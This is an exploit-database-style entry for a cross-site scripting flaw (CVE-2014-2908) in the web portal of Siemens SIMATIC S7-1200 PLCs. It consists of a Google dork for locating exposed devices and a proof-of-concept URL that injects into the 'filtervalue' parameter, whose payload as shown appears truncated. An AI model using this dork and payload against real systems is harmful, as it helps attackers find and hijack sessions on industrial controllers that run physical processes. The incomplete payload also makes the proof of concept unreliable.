# Exploit Title: Siemens SIMATIC S7-1200 CPU Cross-Site Scripting # Google Dork: inurl:/Portal/Portal.mwsl # Date: 22-05-2018 # Exploit Author: t4rkd3vilz, Jameel Nabbo # Vendor Homepage: https://www.siemens.com/ # Version: SIMATIC S7-1200 CPU family Versions: V2.X and V3.X. # Tested on: Kali Linux # CVE: CVE-2014-2908 --> Proof Of Concept http://TargetIp/Portal/Portal.mwsl?PriNav=Bgz&filtername=Name&filtervalue= ">&Send=Filter <--